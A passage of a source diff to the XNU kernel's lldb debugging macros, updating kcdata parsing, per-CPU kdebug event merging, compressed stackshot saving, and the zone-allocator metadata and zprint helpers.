struct.unpack_from('32sI', self.i_data) - self.i_name = u_d[0].strip(chr(0)) + self.i_name = BytesToString(u_d[0].rstrip('\0')) self.obj = u_d[1] logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name)) elif self.i_type == GetTypeForName('KCDATA_TYPE_UINT64_DESC'): self.is_naked_type = True u_d = struct.unpack_from('32sQ', self.i_data) - self.i_name = u_d[0].strip(chr(0)) + self.i_name = BytesToString(u_d[0].rstrip('\0')) self.obj = u_d[1] logging.info("0x%08x: %s%s" % (self.offset, INDENT(), self.i_name)) @@ -944,6 +958,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO')] KCSubTypeElement('imageLoadAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 0, 0), KCSubTypeElement('imageUUID', KCSUBTYPE_TYPE.KC_ST_UINT8, KCSubTypeElement.GetSizeForArray(16, 1), 8, 1), KCSubTypeElement('imageSlidBaseAddress', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 24, 0), + KCSubTypeElement('sharedCacheSlidFirstMapping', KCSUBTYPE_TYPE.KC_ST_UINT64, 8, 32, 0), ), 'shared_cache_dyld_load_info', legacy_size = 0x18 @@ -1238,6 +1253,7 @@ KNOWN_TYPES_COLLECTION[GetTypeForName('STACKSHOT_KCTYPE_STACKSHOT_DURATION')] = ( KCSubTypeElement.FromBasicCtype('stackshot_duration', KCSUBTYPE_TYPE.KC_ST_UINT64, 0), KCSubTypeElement.FromBasicCtype('stackshot_duration_outer', KCSUBTYPE_TYPE.KC_ST_UINT64, 8), + KCSubTypeElement.FromBasicCtype('stackshot_duration_prior', KCSUBTYPE_TYPE.KC_ST_UINT64, 16), ), 'stackshot_duration', merge=True ) @@ -1759,30 +1775,6 @@ def RunCommand(bash_cmd_string, get_stderr = True): return (exit_code, output_str) -parser = argparse.ArgumentParser(description="Decode a kcdata binary file.") -parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False, - help="List all known types", - dest="list_known_types") - -parser.add_argument("-s", "--stackshot", required=False, default=False, - help="Generate a stackshot report file", - dest="stackshot_file") - -parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true') - -parser.add_argument("-p", "--plist", required=False, default=False, - help="output as plist", action="store_true") - -parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. Default is empty string.", dest="sdk") -parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable") -parser.add_argument("--incomplete", action='store_true', help="accept incomplete data") -parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.") - -class VerboseAction(argparse.Action): - def __call__(self, parser, namespace, values, option_string=None): - logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s') -parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0) - @contextlib.contextmanager def data_from_stream(stream): try: @@ -1858,7 +1850,7 @@ def prettify(data): value = '%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X' % tuple(value) elif 'address' in key.lower() and isinstance(value, (int, long)): value = '0x%X' % value - elif key == 'lr': + elif key == 'lr' or key == 'sharedCacheSlidFirstMapping': value = '0x%X' % value elif key == 'thread_waitinfo': value = map(formatWaitInfo, value) @@ -1876,6 +1868,30 @@ def prettify(data): if __name__ == '__main__': + parser = argparse.ArgumentParser(description="Decode a kcdata binary file.") + parser.add_argument("-l", "--listtypes", action="store_true", required=False, default=False, + help="List all known types", + dest="list_known_types") + + parser.add_argument("-s", "--stackshot", required=False, default=False, + help="Generate a stackshot report file", + dest="stackshot_file") + + parser.add_argument("--multiple", help="look for multiple stackshots in a single file", action='store_true') + + parser.add_argument("-p", "--plist", required=False, default=False, + help="output as plist", action="store_true") + + parser.add_argument("-S", "--sdk", required=False, default="", help="sdk property passed to xcrun command to find the required tools. Default is empty string.", dest="sdk") + parser.add_argument("--pretty", default=False, action='store_true', help="make the output a little more human readable") + parser.add_argument("--incomplete", action='store_true', help="accept incomplete data") + parser.add_argument("kcdata_file", type=argparse.FileType('r'), help="Path to a kcdata binary file.") + + class VerboseAction(argparse.Action): + def __call__(self, parser, namespace, values, option_string=None): + logging.basicConfig(level=logging.INFO, stream=sys.stderr, format='%(message)s') + parser.add_argument('-v', "--verbose", action=VerboseAction, nargs=0) + args = parser.parse_args() if args.multiple and args.stackshot_file: diff --git a/tools/lldbmacros/ktrace.py b/tools/lldbmacros/ktrace.py index 80360f650..10848f494 100755 --- a/tools/lldbmacros/ktrace.py +++ b/tools/lldbmacros/ktrace.py @@ -2,7 +2,9 @@ from xnu import * from utils import * from core.lazytarget import * from misc import * +from kcdata import kcdata_item_iterator, KCObject, GetTypeForName, KCCompressedBufferObject from collections import namedtuple +import heapq # From the defines in bsd/sys/kdebug.h: @@ -261,100 +263,118 @@ def ShowKtrace(cmd_args=None): print GetKperfStatus() -class KDCPU(object): - def __init__(self, store, curidx): - self.store = store - self.curidx = curidx - self.oldest_time = None +class KDEvent(object): + """ + Wrapper around kevent pointer that handles sorting logic. + """ + def __init__(self, timestamp, kevent): + self.kevent = kevent + self.timestamp = timestamp + def get_kevent(self): + return self.kevent -def IterateKdebugEvents(): + def __eq__(self, other): + return self.timestamp == other.timestamp + + def __lt__(self, other): + return self.timestamp < other.timestamp + + def __gt__(self, other): + return self.timestamp > other.timestamp + + +class KDCPU(object): """ - Yield events from the in-memory kdebug trace buffers. + Represents all events from a single CPU. """ - ctrl = kern.globals.kd_ctrl_page + def __init__(self, cpuid): + self.cpuid = cpuid + self.iter_store = None + + kdstoreinfo = kern.globals.kdbip[cpuid] + self.kdstorep = kdstoreinfo.kd_list_head + + if self.kdstorep.raw == xnudefines.KDS_PTR_NULL: + # Returns an empty iterrator. It will immediatelly stop at + # first call to __next__(). + return - def get_kdstore(kdstorep): + self.iter_store = self.get_kdstore(self.kdstorep) + + # XXX Doesn't have the same logic to avoid un-mergeable events + # (respecting barrier_min and bufindx) as the C code. + + self.iter_idx = self.iter_store.kds_readlast + + def get_kdstore(self, kdstorep): """ See POINTER_FROM_KDSPTR. """ buf = kern.globals.kd_bufs[kdstorep.buffer_index] return addressof(buf.kdsb_addr[kdstorep.offset]) - def get_kdbuf_timestamp(kdbuf): - time_cpu = kdbuf.timestamp - return unsigned(time_cpu) + # Event iterator implementation returns KDEvent instance - if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0: - return + def __iter__(self): + return self - barrier_min = ctrl.oldest_time + def __next__(self): + # This CPU is out of events + if self.iter_store is None: + raise StopIteration - if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0: - # TODO Yield a wrap event with the barrier_min timestamp. - pass + if self.iter_idx == self.iter_store.kds_bufindx: + self.iter_store = None + raise StopIteration - # Set up CPU state for merging events. - ncpus = ctrl.kdebug_cpus - cpus = [] - for cpu in range(ncpus): - kdstoreinfo = kern.globals.kdbip[cpu] - storep = kdstoreinfo.kd_list_head - store = None - curidx = 0 - if storep.raw != xnudefines.KDS_PTR_NULL: - store = get_kdstore(storep) - curidx = store.kds_readlast - # XXX Doesn't have the same logic to avoid un-mergeable events - # (respecting barrier_min and bufindx) as the C code. + keventp = addressof(self.iter_store.kds_records[self.iter_idx]) + timestamp = unsigned(keventp.timestamp) - cpus.append(KDCPU(store, curidx)) + # check for writer overrun + if timestamp < self.iter_store.kds_timestamp: + raise StopIteration - while True: - earliest_time = 0xffffffffffffffff - min_cpu = None - for cpu in cpus: - if not cpu.store: - continue + # Advance iterator + self.iter_idx += 1 - # Check for overrunning the writer, which also indicates the CPU is - # out of events. - if cpu.oldest_time: - timestamp = cpu.oldest_time + if self.iter_idx == xnudefines.EVENTS_PER_STORAGE_UNIT: + snext = self.iter_store.kds_next + if snext.raw == xnudefines.KDS_PTR_NULL: + # Terminate iteration in next loop. Current element is the + # last one in this CPU buffer. + self.iter_store = None else: - timestamp = get_kdbuf_timestamp( - addressof(cpu.store.kds_records[cpu.curidx])) - cpu.oldest_time = timestamp + self.iter_store = self.get_kdstore(snext) + self.iter_idx = self.iter_store.kds_readlast - if timestamp < cpu.store.kds_timestamp: - cpu.store = None - continue + return KDEvent(timestamp, keventp) - if timestamp < earliest_time: - earliest_time = timestamp - min_cpu = cpu + # Python 2 compatibility + def next(self): + return self.__next__() - # Out of events. - if not min_cpu: - return - yield min_cpu.store.kds_records[min_cpu.curidx] - min_cpu.oldest_time = None +def IterateKdebugEvents(): + """ + Yield events from the in-memory kdebug trace buffers. + """ + ctrl = kern.globals.kd_ctrl_page - min_cpu.curidx += 1 - if min_cpu.curidx == xnudefines.EVENTS_PER_STORAGE_UNIT: - next = min_cpu.store.kds_next - if next.raw == xnudefines.KDS_PTR_NULL: - min_cpu.store = None - min_cpu.curidx = None - else: - min_cpu.store = get_kdstore(next) - min_cpu.curidx = min_cpu.store.kds_readlast + if (ctrl.kdebug_flags & xnudefines.KDBG_BFINIT) == 0: + return + + barrier_min = ctrl.oldest_time - # This CPU is out of events. - if min_cpu.curidx == min_cpu.store.kds_bufindx: - min_cpu.store = None - continue + if (ctrl.kdebug_flags & xnudefines.KDBG_WRAPPED) != 0: + # TODO Yield a wrap event with the barrier_min timestamp. + pass + + # Merge sort all events from all CPUs. + cpus = [KDCPU(cpuid) for cpuid in range(ctrl.kdebug_cpus)] + + for event in heapq.merge(*cpus): + yield event.get_kevent() def GetKdebugEvent(event): @@ -476,7 +496,7 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}): continue event = process.ReadMemory( - unsigned(addressof(event)), event_size, error) + unsigned(event), event_size, error) file_offset += event_size f.write(event) written_nevents += 1 @@ -499,12 +519,30 @@ def SaveKdebugTrace(cmd_args=None, cmd_options={}): kcdata_length = unsigned(kcdata.kcd_length) if kcdata_addr != 0 and kcdata_length != 0: print('writing stackshot') - f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length)) - file_offset += 16 if verbose: - print('stackshot is {} bytes long'.format(kcdata_length)) print('stackshot starts at offset {}'.format(file_offset)) + print('stackshot is {} bytes long'.format(kcdata_length)) ssdata = process.ReadMemory(kcdata_addr, kcdata_length, error) + magic = struct.unpack('I', ssdata[:4]) + if magic[0] == GetTypeForName('KCDATA_BUFFER_BEGIN_COMPRESSED'): + if verbose: + print('found compressed stackshot') + iterator = kcdata_item_iterator(ssdata) + for item in iterator: + kcdata_buffer = KCObject.FromKCItem(item) + if isinstance(kcdata_buffer, KCCompressedBufferObject): + kcdata_buffer.ReadItems(iterator) + decompressed = kcdata_buffer.Decompress(ssdata) + ssdata = decompressed + kcdata_length = len(ssdata) + if verbose: + print( + 'compressed stackshot is {} bytes long'. + format(kcdata_length)) + + f.write(struct.pack(CHUNKHDR_PACK, SSHOT_TAG, 1, 0, kcdata_length)) + file_offset += 16 + f.write(ssdata) file_offset += kcdata_length if verbose: diff --git a/tools/lldbmacros/mbufs.py b/tools/lldbmacros/mbufs.py index 93e85f759..e9120e03d 100755 --- a/tools/lldbmacros/mbufs.py +++ b/tools/lldbmacros/mbufs.py @@ -39,8 +39,7 @@ def MBufStat(cmd_args=None): (mcs.mbcl_total - total - mcs.mbcl_infree), mcs.mbcl_fail_cnt, mbuf.mtbl_cache.mc_waiter_cnt, mcs.mbcl_notified, mcs.mbcl_purge_cnt, - mbuf.mtbl_maxlimit - ) + mbuf.mtbl_maxlimit) # EndMacro: mbuf_stat # Macro: mbuf_walkpkt diff --git a/tools/lldbmacros/memory.py b/tools/lldbmacros/memory.py index be557e7b8..8f62be956 100755 --- a/tools/lldbmacros/memory.py +++ b/tools/lldbmacros/memory.py @@ -31,18 +31,31 @@ def vm_unpack_pointer(packed, params, type_str = 'void *'): addr >>= 64 - bits - shift return kern.GetValueFromAddress(addr, type_str) -def IterateZPerCPU(root, element_type): +def GetZPerCPU(root, cpu, element_type = None): """ Iterates over a percpu variable params: root - value : Value object for per-cpu variable + cpu - int : the CPU number element_type - str : Type of element returns: one slot """ pagesize = kern.globals.page_size mangle = 1 << (8 * kern.ptrsize - 1) + if element_type is None: + element_type = root.GetSBValue().GetType() + return kern.GetValueFromAddress((int(root) | mangle) + cpu * pagesize, element_type) + +def IterateZPerCPU(root, element_type = None): + """ Iterates over a percpu variable + params: + root - value : Value object for per-cpu variable + element_type - str : Type of element + returns: + one slot + """ for i in range(0, kern.globals.zpercpu_early_count): - yield kern.GetValueFromAddress((int(root) | mangle) + i * pagesize, element_type) + yield GetZPerCPU(root, i, element_type) @lldb_command('showzpcpu', "S") def ShowZPerCPU(cmd_args=None, cmd_options={}): @@ -226,25 +239,24 @@ class ZoneMeta(object): Helper class that helpers walking metadata """ - @classmethod - def _looksForeign(cls, addr): - if addr & (kern.globals.page_size - 1): - return False - try: - meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *") - return meta.zm_foreign_cookie[0] == 0x123456789abcdef - except: - return False - def __init__(self, addr, isPageIndex = False): global kern pagesize = kern.globals.page_size zone_info = kern.GetGlobalVariable('zone_info') - self.zone_map_min = unsigned(zone_info.zi_map_range.min_address) - self.zone_map_max = unsigned(zone_info.zi_map_range.max_address) - self.zone_meta_min = unsigned(zone_info.zi_meta_range.min_address) - self.zone_meta_max = unsigned(zone_info.zi_meta_range.max_address) + def load_range(var): + return (unsigned(var.min_address), unsigned(var.max_address)) + + def in_range(x, r): + return x >= r[0] and x <= r[1] + + FOREIGN = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_FOREIGN') + NATIVE = GetEnumValue('zone_addr_kind_t', 'ZONE_ADDR_NATIVE') + + self.meta_range = load_range(zone_info.zi_meta_range) + self.native_range = load_range(zone_info.zi_map_range[NATIVE]) + self.foreign_range = load_range(zone_info.zi_map_range[FOREIGN]) + self.addr_base = min(self.foreign_range[0], self.native_range[0]) addr = unsigned(addr) if isPageIndex: @@ -255,86 +267,146 @@ class ZoneMeta(object): self.address = addr - if self.zone_meta_min <= addr and addr < self.zone_meta_max: + if in_range(addr, self.meta_range): self.kind = 'Metadata' - addr -= (addr - self.zone_meta_min) % sizeof('struct zone_page_metadata') + addr -= addr % sizeof('struct zone_page_metadata') self.meta_addr = addr self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *") - self.page_addr = self.zone_map_min + ((addr - self.zone_meta_min) / sizeof('struct zone_page_metadata') * pagesize) - self.first_offset = 0 - elif self.zone_map_min <= addr and addr < self.zone_map_max: + self.page_addr = self.addr_base + ((addr - self.meta_range[0]) / sizeof('struct zone_page_metadata') * pagesize) + elif in_range(addr, self.native_range) or in_range(addr, self.foreign_range): addr &= ~(pagesize - 1) - page_idx = (addr - self.zone_map_min) / pagesize + page_idx = (addr - self.addr_base) / pagesize self.kind = 'Element' self.page_addr = addr - self.meta_addr = self.zone_meta_min + page_idx * sizeof('struct zone_page_metadata') + self.meta_addr = self.meta_range[0] + page_idx * sizeof('struct zone_page_metadata') self.meta = kern.GetValueFromAddress(self.meta_addr, "struct zone_page_metadata *") - self.first_offset = 0 - elif ZoneMeta._looksForeign(addr): - self.kind = 'Element (F)' - addr &= ~(pagesize - 1) - self.page_addr = addr - self.meta_addr = addr - self.meta = kern.GetValueFromAddress(addr, "struct zone_page_metadata *") - self.first_offset = 32 # ZONE_FOREIGN_PAGE_FIRST_OFFSET in zalloc.c else: self.kind = 'Unknown' self.meta = None self.page_addr = 0 self.meta_addr = 0 - self.first_offset = 0 + + if self.meta: + self.zone = addressof(kern.globals.zone_array[self.meta.zm_index]) + else: + self.zone = None def isSecondaryPage(self): - return self.meta and self.meta.zm_secondary_page + return self.meta and self.meta.zm_chunk_len >= 0xe def getPageCount(self): - return self.meta and self.meta.zm_page_count or 0 + n = self.meta and self.meta.zm_chunk_len or 0 + if self.zone and self.zone.z_percpu: + n *= kern.globals.zpercpu_early_count + return n + + def getAllocAvail(self): + if not self.meta: return 0 + chunk_len = unsigned(self.meta.zm_chunk_len) + page_size = unsigned(kern.globals.page_size) + return chunk_len * page_size / self.zone.z_elem_size def getAllocCount(self): - return self.meta and self.meta.zm_alloc_count or 0 + if not self.meta: return 0 + return self.meta.zm_alloc_size / self.zone.z_elem_size def getReal(self): if self.isSecondaryPage(): - return ZoneMeta(self.meta - self.meta.zm_page_count) + return ZoneMeta(unsigned(self.meta) - sizeof('struct zone_page_metadata') * unsigned(self.meta.zm_page_index)) return self - def getFreeList(self): - if self.meta and self.meta.zm_freelist_offs != unsigned(0xffff): - return kern.GetValueFromAddress(self.page_addr + self.meta.zm_freelist_offs, 'vm_offset_t *') - return 0 + def getElementAddress(self, addr): + meta = self.getReal() + esize = meta.zone.z_elem_size + start = meta.page_addr - def iterateFreeList(self): - cur = self.getFreeList() - while cur: - yield cur + if esize == 0: + return None + + estart = addr - start + return unsigned(start + estart - (estart % esize)) + + def getInlineBitmapChunkLength(self): + if self.zone.z_percpu: + return unsigned(self.zone.z_chunk_pages) + return unsigned(self.meta.zm_chunk_len) + + def getBitmapSize(self): + if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len: + return 0 + if self.meta.zm_inline_bitmap: + return -4 * self.getInlineBitmapChunkLength() + return 8 << (unsigned(self.meta.zm_bitmap) & 0x7); + + def getBitmap(self): + if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len: + return 0 + if self.meta.zm_inline_bitmap: + return unsigned(addressof(self.meta.zm_bitmap)) + bbase = unsigned(kern.globals.zone_info.zi_bits_range.min_address) + index = unsigned(self.meta.zm_bitmap) & ~0x7 + return bbase + index; + + def getFreeCountSlow(self): + if not self.meta or self.zone.z_permanent or not self.meta.zm_chunk_len: + return self.getAllocAvail() - self.getAllocCount() + + n = 0 + if self.meta.zm_inline_bitmap: + for i in xrange(0, self.getInlineBitmapChunkLength()): + m = kern.GetValueFromAddress(self.meta_addr + i * 16, + 'struct zone_page_metadata *'); + bits = unsigned(m.zm_bitmap) + while bits: + n += 1 + bits &= bits - 1 + else: + bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *') + for i in xrange(0, 1 << (unsigned(self.meta.zm_bitmap) & 0x7)): + bits = unsigned(bitmap[i]) + while bits: + n += 1 + bits &= bits - 1 + return n + + def isElementFree(self, addr): + meta = self.meta + + if not meta or self.zone.z_permanent or not meta.zm_chunk_len: + return True + + start = self.page_addr + esize = self.zone.z_elem_size + eidx = (addr - start) / esize + + if meta.zm_inline_bitmap: + i = eidx / 32 + m = unsigned(meta) + sizeof('struct zone_page_metadata') * i + bits = kern.GetValueFromAddress(m, meta).zm_bitmap + return (bits & (1 << (eidx % 32))) != 0 - cur = dereference(cast(cur, 'vm_offset_t *')) - cur = unsigned(cur) ^ unsigned(kern.globals.zp_nopoison_cookie) - cur = kern.GetValueFromAddress(cur, 'vm_offset_t *') + else: + bitmap = kern.GetValueFromAddress(self.getBitmap(), 'uint64_t *') + bits = unsigned(bitmap[eidx / 64]) + return (bits & (1 << (eidx % 64))) != 0 def iterateElements(self): if self.meta is None: return - esize = self.getZone().z_elem_size - offs = self.first_offset - end = kern.globals.page_size - if not self.meta.zm_percpu: - end *= self.meta.zm_page_count + esize = self.zone.z_elem_size + start = 0 + end = unsigned(kern.globals.page_size) * self.meta.zm_chunk_len + end -= end % esize - while offs + esize <= end: - yield kern.GetValueFromAddress(self.page_addr + offs, 'void *') - offs += esize - - def getZone(self): - if self.meta: - return kern.globals.zone_array[self.meta.zm_index] - return None + for offs in xrange(start, end, esize): + yield unsigned(self.page_addr + offs) @lldb_type_summary(['zone_page_metadata']) -@header("{:<18s} {:<18s} {:>8s} {:>8s} {:<18s} {:<20s}".format('ZONE_METADATA', 'FREELIST', 'PG_CNT', 'ALLOC_CNT', 'ZONE', 'NAME')) +@header("{:<20s} {:<10s} {:<10s} {:<24s} {:<20s} {:<20s}".format( + 'METADATA', 'PG_CNT', 'ALLOC_CNT', 'BITMAP', 'ZONE', 'NAME')) def GetZoneMetadataSummary(meta): """ Summarize a zone metadata object params: meta - obj representing zone metadata in the kernel @@ -346,66 +418,73 @@ def GetZoneMetadataSummary(meta): out_str = 'Metadata Description:\n' + GetZoneMetadataSummary.header + '\n' if meta.isSecondaryPage(): - out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}\n".format( - meta.meta_addr, 0, 0, 0, 0, '(fake multipage meta)') + out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}\n".format( + meta.meta_addr, 0, 0, 0, 0, 0, '(fake multipage meta)') meta = meta.getReal() - zinfo = meta.getZone() - out_str += "{:#018x} {:#018x} {:8d} {:8d} {:#018x} {:s}".format( - meta.meta_addr, meta.getFreeList(), meta.getPageCount(), meta.getAllocCount(), - addressof(zinfo), ZoneName(zinfo)) + out_str += "{:<#20x} {:<10d} {:<10d} {:<#18x} @{:<4d} {:<#20x} {:s}".format( + meta.meta_addr, meta.getPageCount(), meta.getAllocCount(), + meta.getBitmap(), meta.getBitmapSize(), meta.zone, ZoneName(meta.zone)) return out_str -@header("{:<18s} {:>10s} {:>18s} {:>18s} {:<10s}".format( - 'ADDRESS', 'TYPE', 'METADATA', 'PAGE_ADDR', 'OFFSET')) +@header("{:<20s} {:<10s} {:<10s} {:<20s} {:<10s}".format( + 'ADDRESS', 'TYPE', 'STATUS', 'PAGE_ADDR', 'OFFSET')) def WhatIs(addr): """ Information about kernel pointer """ global kern meta = ZoneMeta(addr) + estart = None if meta.meta is None: out_str = "Address {:#018x} is outside of any zone map ({:#018x}-{:#018x})\n".format( - addr, meta.zone_map_min, meta.zone_map_max) + addr, meta.native_range[0], meta.native_range[-1] + 1) else: if meta.kind[0] == 'E': # element page_offset_str = "{:d}/{:d}K".format( addr - meta.page_addr, kern.globals.page_size / 1024) + estart = meta.getElementAddress(addr) + if estart is None: + status = "Unattributed" + elif meta.isElementFree(estart): + status = "Free" + else: + status = "Allocated" else: page_offset_str = "-" + status = "-" out_str = WhatIs.header + '\n' - out_str += "{meta.address:#018x} {meta.kind:>10s} {meta.meta_addr:#018x} {meta.page_addr:#018x} {:<10s}\n\n".format( - page_offset_str, meta=meta) + out_str += "{meta.address:<#20x} {meta.kind:<10s} {status:<10s} {meta.page_addr:<#20x} {:<10s}\n\n".format( + page_offset_str, meta=meta, status=status) out_str += GetZoneMetadataSummary(meta) + '\n\n' print out_str - if meta.kind[0] == 'E': + if estart is not None: print "Hexdump:\n" - meta = meta.getReal() - esize = meta.getZone().z_elem_size - start = meta.page_addr - - estart = addr - (start - meta.first_offset) - estart = start + estart - (estart % esize) + meta = meta.getReal() + esize = meta.zone.z_elem_size + start = meta.page_addr + marks = {unsigned(addr): ">"} try: if estart > start: data_array = kern.GetValueFromAddress(estart - 16, "uint8_t *") print_hex_data(data_array[0:16], estart - 16, "") - print "------------------------------------------------------------------" except: pass + print "------------------------------------------------------------------" try: data_array = kern.GetValueFromAddress(estart, "uint8_t *") - print_hex_data(data_array[0:esize], estart, "") + print_hex_data(data_array[0:esize], estart, "", marks) except: + print "*** unable to read memory ***" pass + print "------------------------------------------------------------------" try: - print "------------------------------------------------------------------" data_array = kern.GetValueFromAddress(estart + esize, "uint8_t *") print_hex_data(data_array[0:16], estart + esize, "") except: @@ -423,97 +502,80 @@ def WhatIsHelper(cmd_args=None): # Macro: showzcache @lldb_type_summary(['zone','zone_t']) -@header("{:<18s} {:>5s} {:>10s} {:>12s} {:>12s} {:>9s} {:>9s} {:>9s} {:>9s} {:>9s} {:<20s}".format( -'ZONE', 'ELTS', 'D FULL/EMPTY', 'ALLOCS', 'FREES', 'D_SWAP', 'D_FILL', 'D_DRAIN', 'D_GC', 'D_FAIL', 'NAME')) - -def GetZoneCacheSummary(zone, O): - """ Summarize a zone's cache with important information. - params: - zone: value - obj representing a zone in kernel - returns: - str - summary of the zone's cache contents - """ - format_string = '{:#018x} {:>5d} {:>4d} / {:>4d} {:>12,d} {:>12,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d} {:>9,d} {:<20s}' - mag_capacity = kern.GetGlobalVariable('magazine_element_count') - depot_capacity = kern.GetGlobalVariable('depot_element_count') - - cache_elem_count = 0 - allocs = 0 - frees = 0 - - if zone.__getattr__('cpu_cache_enabled') : - for cache in IterateZPerCPU(zone.zcache.zcc_pcpu, 'struct zcc_per_cpu_cache *'): - cache_elem_count += cache.current.zcc_magazine_index - cache_elem_count += cache.previous.zcc_magazine_index - allocs += cache.zcc_allocs - frees += cache.zcc_frees - - depot = zone.zcache.zcc_depot - cache_elem_count += depot.zcc_depot_index * mag_capacity - print O.format(format_string, zone, cache_elem_count, - depot.zcc_depot_index, depot_capacity - depot.zcc_depot_index, - allocs, frees, depot.zcc_swap, depot.zcc_fill, depot.zcc_drain, - depot.zcc_gc, depot.zcc_fail, ZoneName(zone)) - -@lldb_command('showzcache', fancy=True) -def ZcachePrint(cmd_args=None, cmd_options={}, O=None): - """ Routine to print a summary listing of all the kernel zones cache contents - All columns are printed in decimal - """ - global kern - with O.table(GetZoneCacheSummary.header): - for zval in kern.zones: - if zval.__getattr__('cpu_cache_enabled') : - GetZoneCacheSummary(zval, O) - -# EndMacro: showzcache - -# Macro: showzcachecpu - -@lldb_type_summary(['zone','zone_t']) -@header("{:18s} {:32s} {:<10s} {:<10s}".format( -'ZONE', 'NAME', 'CACHE_ELTS', 'CPU_INFO')) - -def GetZoneCacheCPUSummary(zone, O): +@header("{:18s} {:32s} {:>6s} {:>6s} {:>6s} {:>6s} {:>6s} {:>6s} {:11s} {:>11s} {:>11s} {:>8s} {:>7s} {:>7s} {:>6s} {:>6s} {:>8s} {:>6s} {:>5s} {:>7s} {:<18s} {:<20s}").format( +@header(("{:<18s} {:_^47s} {:_^24s} {:_^13s} {:_^28s}\n"+ +"{:<18s} {:>11s} {:>11s} {:>11s} {:>11s} {:>8s} {:>7s} {:>7s} {:>6s} {:>6s} {:>8s} {:>6s} {:>5s} {:>7s} {:<18s} {:<20s}").format( '', 'SIZE (bytes)', 'ELEMENTS (#)', 'PAGES', 'ALLOC CHUNK CONFIG', -'ZONE', 'TOTAL', 'ALLOC', 'FREE', 'ALLOC', 'FREE', 'CACHE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME')) +'ZONE', 'TOTAL', 'ALLOC', 'CACHE', 'FREE', 'ALLOC', 'CACHE', 'FREE', 'COUNT', 'FREE', 'SIZE (P)', 'ELTS', 'WASTE', 'ELT_SZ', 'FLAGS', 'NAME')) def GetZoneSummary(zone_val, marks, stats): """ Summarize a zone with important information. See help zprint for description of each field params: @@ -590,16 +661,21 @@ def GetZoneSummary(zone_val, marks, stats): out_string = "" zone = GetZone(zone_val, marks) - format_string = '{zone:#018x} {cur_size:11,d} {used_size:11,d} {free_size:11,d} ' - format_string += '{count_elts:8,d} {zone.countfree:7,d} {cache_elem_count:7,d} ' - format_string += '{zone.page_count:6,d} {zone.allfree_page_count:6,d} ' - format_string += '{alloc_size_kb:3,d}K ({zone.alloc_pages:d}) {alloc_count:6,d} {alloc_waste:5,d} {zone.pcpu_elem_size:7,d} ' + pcpu_scale = 1 + if zone_val.z_percpu: + pcpu_scale = unsigned(kern.globals.zpercpu_early_count) + + format_string = '{zone:#018x} {zd[size]:11,d} {zd[used_size]:11,d} {zd[cached_size]:11,d} {zd[free_size]:11,d} ' + format_string += '{zd[element_count]:8,d} {zd[cache_element_count]:7,d} {zone.z_elems_free:7,d} ' + format_string += '{z_wired_cur:6,d} {z_wired_empty:6,d} ' + format_string += '{alloc_size_kb:3,d}K ({zone.z_chunk_pages:d}) ' + format_string += '{zd[allocation_count]:6,d} {zd[allocation_waste]:5,d} {z_elem_size:7,d} ' format_string += '{markings:<18s} {zone_name:<20s}' markings="" if zone["destroyed"]: markings+="I" - + for mark in marks: if zone[mark[0]]: markings += mark[1] @@ -607,10 +683,11 @@ def GetZoneSummary(zone_val, marks, stats): markings+=" " alloc_size_kb = zone["allocation_size"] / 1024 - out_string += format_string.format(zone=zone_val, free_size=zone["free_size"], used_size=zone["used_size"], - cur_size=zone["size"], count_elts=zone["element_count"], cache_elem_count=zone["cache_element_count"], - alloc_count=zone["allocation_count"], alloc_size_kb=alloc_size_kb, alloc_waste=zone["allocation_waste"], - markings=markings, zone_name=zone["name"]) + out_string += format_string.format(zone=zone_val, zd=zone, + z_wired_cur=unsigned(zone_val.z_wired_cur) * pcpu_scale, + z_wired_empty=unsigned(zone_val.z_wired_empty) * pcpu_scale, + z_elem_size=unsigned(zone_val.z_elem_size) * pcpu_scale, + alloc_size_kb=alloc_size_kb, markings=markings, zone_name=zone["name"]) if zone["exhaustible"] : out_string += " (max: {:d})".format(zone["page_count_max"] * pagesize) @@ -620,6 +697,7 @@ def GetZoneSummary(zone_val, marks, stats): stats["cur_size"] += zone["size"] stats["used_size"] += zone["used_size"] + stats["cached_size"] += zone["cached_size"] stats["free_size"] += zone["free_size"] stats["cur_pages"] += zone["page_count"] stats["free_pages"] += zone["allfree_page_count"] @@ -634,46 +712,50 @@ def Zprint(cmd_args=None, cmd_options={}, O=None): Output json All columns are printed in decimal Legend: + ! - zone uses VA sequestering + $ - not encrypted during hibernation + A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv C - collectable D - destructible - X - expandable - $ - not encrypted during hibernation - H - exhaustible + E - Per-cpu caching is enabled for this zone F - allows foreign memory (memory not allocated from any zone map) + G - currently running GC + H - exhaustible + I - zone was destroyed and is no longer valid + L - zone is being monitored by zleaks M - gzalloc will avoid monitoring this zone - R - will be refilled when below low water mark - O - does not allow refill callout to fill zone on noblock allocation N - zone requires alignment (avoids padding this zone for debugging) - A - currently trying to allocate more backing memory from kernel_memory_allocate without VM priv + O - does not allow refill callout to fill 